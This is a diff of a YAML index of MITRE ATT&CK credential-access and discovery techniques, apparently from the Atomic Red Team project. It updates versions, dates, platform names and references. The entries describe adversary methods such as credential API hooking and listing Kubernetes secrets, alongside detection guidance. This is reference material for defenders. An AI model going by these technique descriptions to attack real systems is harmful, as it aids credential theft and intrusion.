+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -47867,81 +48592,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -47954,28 +48608,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48032,9 +48752,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -48065,7 +48784,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -48089,8 +48808,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -48155,12 +48872,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests: []
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -48219,7 +48935,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -48240,7 +48955,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -48261,13 +48976,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests: []
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48290,15 +49003,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -48324,13 +49036,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48355,12 +49066,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -48402,13 +49112,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -48469,12 +49178,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -48538,19 +49246,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -48597,7 +49304,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -48664,12 +49370,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -48759,18 +49464,17 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -48813,12 +49517,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -48859,12 +49562,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -48949,7 +49651,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1135:
@@ -49011,12 +49712,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests: []
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -49067,12 +49767,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49083,7 +49782,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -49098,7 +49796,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -49146,7 +49843,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests: []
   T1016.002:
@@ -49218,12 +49916,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49265,122 +49962,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
